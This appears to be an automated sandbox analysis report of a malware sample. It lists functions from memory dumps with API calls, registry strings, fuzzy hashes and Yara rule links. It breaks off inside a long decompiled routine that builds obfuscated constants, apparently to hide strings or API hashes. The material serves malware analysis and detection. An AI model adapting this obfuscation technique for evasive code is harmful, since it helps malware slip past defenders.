Uniqueness Score: -1.00%

Function 010543B3, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 838e6352a3da158dd967b8a7e0baf03015a561bb2feece904f6b9f54a18fdcad
Instruction ID: 946c6a2ad6ebffccc24e774d1669dc1fb29d6d03a3d35efc4aca189c82d83749
Opcode Fuzzy Hash: 838e6352a3da158dd967b8a7e0baf03015a561bb2feece904f6b9f54a18fdcad
Instruction Fuzzy Hash: 9D211271D0120AEBDB48DFA8D9865EEBFF0FB50314F208199D845B6250E7B45B449F81

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DD850, Relevance: 3.1, APIs: 2, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DD95D: _abort.LIBCMT ref: 6E9DD98A
Part of subcall function 6E9DD95D: _free.LIBCMT ref: 6E9DD9BD

Part of subcall function 6E9DD5E4: GetOEMCP.KERNEL32(00000000,6E9DD86D,?,?,?), ref: 6E9DD60F

_free.LIBCMT ref: 6E9DD8CA
_free.LIBCMT ref: 6E9DD900

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$_abort
String ID:
API String ID: 195396716-0
Opcode ID: 30e974d184cb1e54df13bb3f8613d40a897d52a26192135b9340524a56275e5a
Instruction ID: 3acb5a8d61273fcf56b19c9773b1a15da3c573d80318e40da7d62b1149f26089
Opcode Fuzzy Hash: 30e974d184cb1e54df13bb3f8613d40a897d52a26192135b9340524a56275e5a
Instruction Fuzzy Hash: BA31B231504A59AFDB01DFA8D840BDA7BF8EF81324F1185A9E9148B390EB32DC68CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C67A5, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E9C67AC
std::locale::_Init.LIBCPMT ref: 6E9C67CD

Part of subcall function 6E9C5FD3: __EH_prolog3.LIBCMT ref: 6E9C5FDA
Part of subcall function 6E9C5FD3: std::_Lockit::_Lockit.LIBCPMT ref: 6E9C5FE5
Part of subcall function 6E9C5FD3: std::locale::_Setgloballocale.LIBCPMT ref: 6E9C6000
Part of subcall function 6E9C5FD3: _Yarn.LIBCPMT ref: 6E9C6016
Part of subcall function 6E9C5FD3: std::_Lockit::~_Lockit.LIBCPMT ref: 6E9C6056

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: 69af1f9641bfa35e4dd56934393377e693da59409cd9bbe743f3c2a7051b7deb
Instruction ID: f41edcba2843dedfcb8e33789247e79b6a30ff312b79f43d8c6839dd55e3649f
Opcode Fuzzy Hash: 69af1f9641bfa35e4dd56934393377e693da59409cd9bbe743f3c2a7051b7deb
Instruction Fuzzy Hash: 17E0DFB2A517225BE7262BE484003FCA5986FA1F2AF140C1AD6015FE80CBE0E8409FC3

Uniqueness

Uniqueness Score: -1.00%

Function 010631D2, Relevance: 1.6, APIs: 1, Instructions: 77processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 010632BB

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: 926f55afa2e80296d23e12ca33d949a64eb37793a625a16decab7e8b6d872f77
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 14311672901249BBCF65DF96CD49CDFBFB5FB99704F108188F91462220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01044248, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 010442F1

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: 2be4de5360b839783dea2e6dbf74010fb39c2d96e40bea3684fea165b587c398
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: 491128B5E00208EBDB44DFE5D94AADEBBF1FB54308F208099E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E17FC, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 6E9D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E9C8F9C,00000105,000000FF,24448D6E,00000000,?,6E9B1687,?,00000103,000000FF), ref: 6E9D9C04

_free.LIBCMT ref: 6E9E181C

Part of subcall function 6E9D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BAE
Part of subcall function 6E9D9B98: GetLastError.KERNEL32(6E9D6995,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BC0

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: dce41a241acb09b108ce58a5f33bb46d9c18e857b73b6d70d6a7b0a562f87505
Instruction ID: bf37e4fefa8eee22123d77731be2ea6cd9e143639d6088dca7ed9ecf47919da7
Opcode Fuzzy Hash: dce41a241acb09b108ce58a5f33bb46d9c18e857b73b6d70d6a7b0a562f87505
Instruction Fuzzy Hash: 8DF06271005B049FE3259F45D841792B7ECEF45715F10882ED2DA97A91CBB4E448CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6E9D9BD2, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E9C8F9C,00000105,000000FF,24448D6E,00000000,?,6E9B1687,?,00000103,000000FF), ref: 6E9D9C04

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9497aaf969b04f68ebfc1e531b91fa75182a7cf5c9283132c9893c179e56f396
Instruction ID: 2860af6de7ddc596e11ff2021fbe4b83c202fb04f4f76032a4a5fbeaba05fff0
Opcode Fuzzy Hash: 9497aaf969b04f68ebfc1e531b91fa75182a7cf5c9283132c9893c179e56f396
Instruction Fuzzy Hash: 0AE0E531544E325AEA513AF68C7078E368C9F432A8F028920ED1CA6584DFA1D489CEE8

Uniqueness

Uniqueness Score: -1.00%

Function 010517CB, Relevance: 1.3, APIs: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 0105188D

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 24c837d08d4a2dd9f86ee2bc72b6121461fc706039007172ff38da7f4520dc79
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: E42124B5D0120DFFDB08DFA4D94A9EEBBB4EB44304F208199E425B7240E3B56B049FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E9BF700, Relevance: 37.2, APIs: 18, Strings: 3, Instructions: 404stringmemoryCOMMON

Download Yara Rule

APIs

CoTaskMemAlloc.OLE32(6E9BED98,B5334A76,00000000,00000000), ref: 6E9BF79A
CharNextW.USER32(?,00000000), ref: 6E9BF819
CharNextW.USER32(00000000,?,00000000), ref: 6E9BF81E
CharNextW.USER32(00000000,?,00000000), ref: 6E9BF823
CharNextW.USER32(00000000,?,00000000), ref: 6E9BF828
CharNextW.USER32(?,?,B5334A76,00000000,00000000), ref: 6E9BF85F
CharNextW.USER32(?,?,B5334A76,00000000,00000000), ref: 6E9BF86F
CharNextW.USER32(00000000,?,B5334A76,00000000,00000000), ref: 6E9BF8CE
CoTaskMemFree.OLE32(00000000,B5334A76,00000000,00000000), ref: 6E9BF8F3
lstrcmpiW.KERNEL32(?,?,?,B5334A76,00000000,00000000), ref: 6E9BF94E
CoTaskMemFree.OLE32(00000000,?,B5334A76,00000000,00000000), ref: 6E9BF966
CharNextW.USER32(?,?,B5334A76,00000000,00000000), ref: 6E9BF9B3
CharNextW.USER32(?,B5334A76,00000000,00000000), ref: 6E9BF9C3
CoTaskMemFree.OLE32(00000000,?,B5334A76,00000000,00000000), ref: 6E9BF9E5
CoTaskMemFree.OLE32(00000000,B5334A76,00000000,00000000), ref: 6E9BFA03
lstrcmpiW.KERNEL32(?,6E9F8D3C,?,?,C000008C,00000000,00000000), ref: 6E9BFABD
CoTaskMemFree.OLE32(00000000,C000008C,00000000,00000000), ref: 6E9BFADC
CharNextW.USER32(?,?,00000000,00000000,00000000,?,?,C000008C,00000000,00000000), ref: 6E9BFBA1

Strings

HKCR, xrefs: 6E9BF800
HKCU{Software{Classes, xrefs: 6E9BF82A
}}, xrefs: 6E9BF8B0

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Task$Free$lstrcmpi$Alloc
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 2337762536-1142484189
Opcode ID: baaef82a1eddf1291e188a67eab1332d928c793159569df094bb5a5b2d4ad84b
Instruction ID: dd5cf1ce734ab35c90d753cc34a0cc1692e4e5c69699ece4cd50308f6e6f6995
Opcode Fuzzy Hash: baaef82a1eddf1291e188a67eab1332d928c793159569df094bb5a5b2d4ad84b
Instruction Fuzzy Hash: 97E1B13990421A9FDB149FE8CCA479FB7B8EF55308F204569E906EB244EB30D944CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0105577E, Relevance: 27.4, Strings: 21, Instructions: 1137
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0105577E() {
				char _v24;
				signed int _v40;
				char _v68;
				signed int _v76;
				char _v100;
				signed int _v124;
				signed int _v136;
				signed int _v140;
				signed int _v148;
				intOrPtr _v152;
				signed int _v156;
				char _v164;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				unsigned int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				unsigned int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				unsigned int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				unsigned int _v352;
				signed int _v356;
				unsigned int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				unsigned int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				unsigned int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				void* __ebx;
				signed int _t1203;
				char _t1227;
				signed int _t1228;
				void* _t1236;
				void* _t1257;
				signed int _t1274;
				void* _t1278;
				signed int _t1279;
				signed int _t1280;
				signed int _t1281;
				signed int _t1282;
				signed int _t1283;
				signed int _t1284;
				signed int _t1285;
				signed int _t1286;
				signed int _t1287;
				signed int _t1288;
				signed int _t1289;
				signed int _t1290;
				signed int _t1291;
				signed int _t1292;
				signed int _t1293;
				signed int _t1294;
				signed int _t1295;
				signed int _t1296;
				signed int _t1297;
				signed int _t1298;
				signed int _t1299;
				signed int _t1300;
				signed int _t1301;
				signed int _t1302;
				signed int _t1303;
				signed int _t1304;
				signed int _t1305;
				signed int _t1418;
				signed int _t1419;
				signed int _t1425;
				void* _t1427;
				signed int _t1431;
				signed int _t1455;
				void* _t1457;
				void* _t1460;
				void* _t1461;
				void* _t1462;

				_t1457 = (_t1455 & 0xfffffff8) - 0x290;
				_v464 = 0x824775;
				_v464 = _v464 | 0xf4ce1248;
				_t1279 = 0x16;
				_v464 = _v464 / _t1279;
				_v464 = _v464 ^ 0x0b20a7e0;
				_t1427 = 0x9128461;
				_v656 = 0xeb14ec;
				_v656 = _v656 + 0xffffa9c6;
				_t1280 = 0x30;
				_t1274 = 0x51;
				_v656 = _v656 * 0x6e;
				_v656 = _v656 + 0xffff39d4;
				_v656 = _v656 ^ 0x64dd2a50;
				_v480 = 0x9df1b2;
				_v480 = _v480 | 0xbf3fdcff;
				_v480 = _v480 ^ 0xbfbffdff;
				_v440 = 0x5b8256;
				_v440 = _v440 + 0xcf37;
				_v440 = _v440 / _t1280;
				_v440 = _v440 ^ 0x000912f3;
				_v612 = 0x456813;
				_t1281 = 0x26;
				_v612 = _v612 * 0x61;
				_v612 = _v612 << 5;
				_v612 = _v612 + 0x145c;
				_v612 = _v612 ^ 0x498cca84;
				_v388 = 0xf794ba;
				_v388 = _v388 << 0xb;
				_v388 = _v388 / _t1274;
				_v388 = _v388 ^ 0x0254abdb;
				_v356 = 0x6751c8;
				_v356 = _v356 << 7;
				_v356 = _v356 + 0xffff2f8f;
				_v356 = _v356 ^ 0x33a22b41;
				_v592 = 0xf5f6bf;
				_v592 = _v592 << 5;
				_v592 = _v592 + 0x7ad9;
				_v592 = _v592 | 0x752e76b5;
				_v592 = _v592 ^ 0x7fbe3031;
				_v528 = 0xf93da1;
				_v528 = _v528 / _t1281;
				_t1282 = 0xd;
				_v528 = _v528 / _t1282;
				_v528 = _v528 * 0x7d;
				_v528 = _v528 ^ 0x00334431;
				_v196 = 0x5ca728;
				_v196 = _v196 ^ 0x3e9890fc;
				_v196 = _v196 ^ 0x3ec71672;
				_v268 = 0x9aab1d;
				_v268 = _v268 + 0xffff4f6b;
				_v268 = _v268 ^ 0x0095c1d2;
				_v428 = 0x82cc96;
				_v428 = _v428 + 0x22b1;
				_v428 = _v428 + 0xffffa7e2;
				_v428 = _v428 ^ 0x008b49e2;
				_v604 = 0x2e3db0;
				_v604 = _v604 + 0xfe08;
				_t1283 = 0x1a;
				_v604 = _v604 / _t1283;
				_t1284 = 0x59;
				_v604 = _v604 / _t1284;
				_v604 = _v604 ^ 0x000844a4;
				_v424 = 0x5bd8c1;
				_v424 = _v424 >> 7;
				_v424 = _v424 + 0x2625;
				_v424 = _v424 ^ 0x0002acf2;
				_v296 = 0x394c59;
				_v296 = _v296 >> 8;
				_v296 = _v296 ^ 0x0007a8c8;
				_v304 = 0x853b79;
				_v304 = _v304 << 0xd;
				_v304 = _v304 ^ 0xa76b95fa;
				_v596 = 0x70ddc;
				_v596 = _v596 + 0xffff539b;
				_v596 = _v596 | 0x1f4010c2;
				_v596 = _v596 + 0x62b1;
				_v596 = _v596 ^ 0x1f40e17a;
				_v416 = 0x1fddc3;
				_t1285 = 0x3c;
				_v416 = _v416 * 0x28;
				_v416 = _v416 | 0xfd6e7dea;
				_v416 = _v416 ^ 0xfdf30a8d;
				_v384 = 0x1c9c37;
				_v384 = _v384 >> 2;
				_v384 = _v384 | 0x1a693341;
				_v384 = _v384 ^ 0x1a6d1498;
				_v276 = 0xa6072;
				_t165 =  &_v276; // 0xa6072
				_v276 =  *_t165 / _t1285;
				_v276 = _v276 ^ 0x000097da;
				_v256 = 0x116684;
				_t1286 = 0x43;
				_v256 = _v256 / _t1286;
				_v256 = _v256 ^ 0x0006d384;
				_v392 = 0x500107;
				_t1287 = 0x7b;
				_v392 = _v392 / _t1287;
				_v392 = _v392 ^ 0x6a54f113;
				_v392 = _v392 ^ 0x6a54c6f2;
				_v228 = 0x98ed12;
				_v228 = _v228 ^ 0x314dc832;
				_v228 = _v228 ^ 0x31da2c3a;
				_v512 = 0xf160ea;
				_t1288 = 0x32;
				_v512 = _v512 / _t1288;
				_v512 = _v512 << 6;
				_v512 = _v512 + 0xffff2343;
				_v512 = _v512 ^ 0x0132148d;
				_v200 = 0x18cadc;
				_v200 = _v200 + 0xffff7898;
				_v200 = _v200 ^ 0x001da22f;
				_v372 = 0x3ab003;
				_t1418 = 0x2e;
				_v372 = _v372 / _t1418;
				_t1289 = 0x52;
				_v372 = _v372 * 0x2d;
				_v372 = _v372 ^ 0x0033f7e5;
				_v220 = 0x921bdd;
				_v220 = _v220 + 0xffffb27e;
				_v220 = _v220 ^ 0x00943619;
				_v600 = 0xb6ccb4;
				_v600 = _v600 | 0x2cc9304a;
				_v600 = _v600 + 0x2f52;
				_v600 = _v600 + 0xe808;
				_v600 = _v600 ^ 0x2d0ac47b;
				_v312 = 0x65122d;
				_v312 = _v312 + 0xffff65df;
				_v312 = _v312 ^ 0x006afa6b;
				_v620 = 0x32d96d;
				_v620 = _v620 + 0x3bc8;
				_v620 = _v620 | 0xdec6debf;
				_v620 = _v620 ^ 0xdef4a963;
				_v488 = 0xe0be7f;
				_v488 = _v488 >> 0xd;
				_v488 = _v488 ^ 0xc942f524;
				_v488 = _v488 ^ 0xc94ef9a5;
				_v492 = 0x17c9b1;
				_v492 = _v492 << 1;
				_v492 = _v492 * 0x49;
				_v492 = _v492 ^ 0x0d90b4f5;
				_v516 = 0x7e72bd;
				_v516 = _v516 << 4;
				_v516 = _v516 + 0xd1ea;
				_v516 = _v516 * 0x4b;
				_v516 = _v516 ^ 0x50f43a66;
				_v524 = 0xcc9e95;
				_v524 = _v524 | 0x288ce2da;
				_v524 = _v524 / _t1289;
				_v524 = _v524 + 0xfffff98c;
				_v524 = _v524 ^ 0x007d035c;
				_v224 = 0xd176b8;
				_v224 = _v224 ^ 0x234d6d31;
				_v224 = _v224 ^ 0x239eb650;
				_v532 = 0x4b4764;
				_v532 = _v532 >> 6;
				_v532 = _v532 | 0xa9a5f0a1;
				_v532 = _v532 + 0xffffd9a4;
				_v532 = _v532 ^ 0xa9a7eda1;
				_v564 = 0xb486e9;
				_v564 = _v564 ^ 0x7d78e01a;
				_v564 = _v564 >> 4;
				_t1290 = 0x7e;
				_v564 = _v564 * 0x3a;
				_v564 = _v564 ^ 0xc80a676e;
				_v608 = 0x4da438;
				_v608 = _v608 + 0xfffff5f1;
				_v608 = _v608 / _t1290;
				_v608 = _v608 ^ 0x391b81fb;
				_v608 = _v608 ^ 0x3913dcf4;
				_v292 = 0xeca340;
				_v292 = _v292 + 0xd406;
				_v292 = _v292 ^ 0x00e60de5;
				_v244 = 0x9935f4;
				_t1291 = 0x6d;
				_v244 = _v244 / _t1291;
				_v244 = _v244 ^ 0x000602ef;
				_v568 = 0x1b59a3;
				_v568 = _v568 + 0xffffda3c;
				_v568 = _v568 / _t1291;
				_t1292 = 0x5f;
				_v568 = _v568 * 0x6f;
				_v568 = _v568 ^ 0x0012dcd4;
				_v380 = 0xe3a892;
				_v380 = _v380 << 8;
				_v380 = _v380 >> 1;
				_v380 = _v380 ^ 0x71d58de7;
				_v324 = 0x75b16d;
				_v324 = _v324 ^ 0x5772578a;
				_v324 = _v324 ^ 0x5701c761;
				_v404 = 0x3b5463;
				_v404 = _v404 >> 6;
				_v404 = _v404 | 0x4ca4b14e;
				_v404 = _v404 ^ 0x4cab3161;
				_v632 = 0xba11d3;
				_v632 = _v632 << 1;
				_v632 = _v632 / _t1418;
				_v632 = _v632 * 0x78;
				_v632 = _v632 ^ 0x03c034c4;
				_v316 = 0xe75391;
				_v316 = _v316 + 0xffff3c43;
				_v316 = _v316 ^ 0x00e250c9;
				_v460 = 0x28752;
				_v460 = _v460 << 0xe;
				_v460 = _v460 ^ 0xd47ca498;
				_v460 = _v460 ^ 0x75a92cd2;
				_v452 = 0x7cbb67;
				_v452 = _v452 >> 0xe;
				_v452 = _v452 * 0x4f;
				_v452 = _v452 ^ 0x00054169;
				_v204 = 0x38b73d;
				_v204 = _v204 | 0x990e3a0f;
				_v204 = _v204 ^ 0x993fe3e3;
				_v236 = 0x524821;
				_v236 = _v236 << 0xd;
				_v236 = _v236 ^ 0x490dd32e;
				_v308 = 0x2957ef;
				_v308 = _v308 * 0x1f;
				_v308 = _v308 ^ 0x050b138d;
				_v504 = 0x652f8f;
				_v504 = _v504 << 8;
				_v504 = _v504 / _t1274;
				_v504 = _v504 / _t1292;
				_v504 = _v504 ^ 0x0006c444;
				_v300 = 0xd78d8b;
				_v300 = _v300 << 2;
				_v300 = _v300 ^ 0x035e80b1;
				_v624 = 0x35553b;
				_v624 = _v624 ^ 0x395d48e4;
				_t443 =  &_v624; // 0x395d48e4
				_t1293 = 0x6f;
				_v624 =  *_t443 / _t1293;
				_v624 = _v624 ^ 0x31a8bfbb;
				_v624 = _v624 ^ 0x312f0a9e;
				_v364 = 0xd1d5f0;
				_t1419 = 0x2b;
				_t1294 = 0x7d;
				_v364 = _v364 * 0x63;
				_v364 = _v364 >> 4;
				_v364 = _v364 ^ 0x05189ef6;
				_v580 = 0x14eecd;
				_v580 = _v580 * 0x4e;
				_v580 = _v580 << 3;
				_v580 = _v580 * 0x6d;
				_v580 = _v580 ^ 0xb997e56a;
				_v572 = 0xcdc506;
				_v572 = _v572 ^ 0xcede99d8;
				_v572 = _v572 >> 0xd;
				_v572 = _v572 >> 1;
				_v572 = _v572 ^ 0x000630d7;
				_v280 = 0xe6046e;
				_v280 = _v280 + 0x9296;
				_v280 = _v280 ^ 0x00ec8e25;
				_v540 = 0x40ca57;
				_v540 = _v540 + 0x2267;
				_v540 = _v540 + 0xfe06;
				_v540 = _v540 + 0xf2ab;
				_v540 = _v540 ^ 0x00420313;
				_v548 = 0xc824b2;
				_v548 = _v548 + 0xffff1921;
				_v548 = _v548 | 0x10558cb3;
				_v548 = _v548 / _t1419;
				_v548 = _v548 ^ 0x006c7cd7;
				_v376 = 0x1589ed;
				_v376 = _v376 / _t1294;
				_v376 = _v376 + 0xffffad95;
				_v376 = _v376 ^ 0xfffd5564;
				_v248 = 0x731c8e;
				_v248 = _v248 << 9;
				_v248 = _v248 ^ 0xe639840a;
				_v588 = 0x68cab3;
				_v588 = _v588 << 8;
				_v588 = _v588 * 0x78;
				_v588 = _v588 ^ 0x01fc55c9;
				_v588 = _v588 ^ 0x1ef54ae2;
				_v408 = 0xb0112;
				_v408 = _v408 + 0xa834;
				_v408 = _v408 << 6;
				_v408 = _v408 ^ 0x02ee306c;
				_v436 = 0x66c5a3;
				_v436 = _v436 << 6;
				_v436 = _v436 / _t1419;
				_v436 = _v436 ^ 0x00958e12;
				_v556 = 0x32a5c5;
				_v556 = _v556 ^ 0xdb018125;
				_v556 = _v556 ^ 0x836f7016;
				_v556 = _v556 * 0x5e;
				_v556 = _v556 ^ 0x71ee7f44;
				_v232 = 0x7dcf08;
				_v232 = _v232 ^ 0x3ef79315;
				_v232 = _v232 ^ 0x3e82b50e;
				_v240 = 0xffaa48;
				_v240 = _v240 * 0x39;
				_v240 = _v240 ^ 0x38e8e9e2;
				_v368 = 0x5cab8a;
				_v368 = _v368 + 0xffffe57f;
				_v368 = _v368 >> 6;
				_v368 = _v368 ^ 0x00064138;
				_v288 = 0xe3e012;
				_t1295 = 0x7a;
				_v288 = _v288 / _t1295;
				_v288 = _v288 ^ 0x0009185c;
				_v400 = 0x81de2f;
				_v400 = _v400 | 0x36f9fc56;
				_v400 = _v400 << 0xb;
				_v400 = _v400 ^ 0xcffafc4f;
				_v476 = 0x7e648d;
				_v476 = _v476 + 0xede8;
				_v476 = _v476 << 7;
				_v476 = _v476 ^ 0x3fa4ce2f;
				_v332 = 0x97c695;
				_v332 = _v332 ^ 0x6c5baa88;
				_v332 = _v332 ^ 0x6ccfb37b;
				_v252 = 0xc87404;
				_t1296 = 0x66;
				_v252 = _v252 / _t1296;
				_v252 = _v252 ^ 0x000d39ba;
				_v340 = 0xf01581;
				_v340 = _v340 >> 4;
				_v340 = _v340 ^ 0x00095e23;
				_v216 = 0x239ee2;
				_t1297 = 0x1d;
				_v216 = _v216 / _t1297;
				_v216 = _v216 ^ 0x00078d69;
				_v472 = 0x5a6c6e;
				_v472 = _v472 | 0x4c6b3df7;
				_v472 = _v472 + 0xffff164f;
				_v472 = _v472 ^ 0x4c773344;
				_v648 = 0x261e2;
				_t1298 = 0x50;
				_v648 = _v648 * 0x16;
				_v648 = _v648 >> 9;
				_v648 = _v648 ^ 0xb7138457;
				_v648 = _v648 ^ 0xb7162f7c;
				_v576 = 0xee6ff9;
				_v576 = _v576 + 0xfffff7f6;
				_v576 = _v576 << 9;
				_v576 = _v576 << 2;
				_v576 = _v576 ^ 0x7339d67e;
				_v352 = 0x86e5fa;
				_v352 = _v352 * 0x76;
				_v352 = _v352 >> 0x10;
				_v352 = _v352 ^ 0x000205f9;
				_v192 = 0xc62af3;
				_v192 = _v192 >> 6;
				_v192 = _v192 ^ 0x000fb1b1;
				_v520 = 0xa53a44;
				_v520 = _v520 >> 0xf;
				_v520 = _v520 / _t1298;
				_v520 = _v520 | 0x8f5b26e1;
				_v520 = _v520 ^ 0x8f5e1219;
				_v456 = 0x912dde;
				_v456 = _v456 << 2;
				_t1299 = 0xb;
				_v456 = _v456 / _t1299;
				_v456 = _v456 ^ 0x0032fd53;
				_v448 = 0x6f734;
				_v448 = _v448 >> 4;
				_v448 = _v448 << 9;
				_v448 = _v448 ^ 0x00d253bf;
				_v336 = 0xf08089;
				_v336 = _v336 + 0xe858;
				_v336 = _v336 ^ 0x00fcdc86;
				_v320 = 0x37424b;
				_v320 = _v320 | 0xffbd6d65;
				_v320 = _v320 ^ 0xffb56b99;
				_v644 = 0x4bb545;
				_v644 = _v644 + 0xffff34f7;
				_v644 = _v644 ^ 0x33e61954;
				_t1300 = 0x3a;
				_v644 = _v644 / _t1300;
				_v644 = _v644 ^ 0x00e0e491;
				_v396 = 0x503f29;
				_v396 = _v396 << 5;
				_v396 = _v396 >> 5;
				_v396 = _v396 ^ 0x005c4748;
				_v284 = 0xc2e86c;
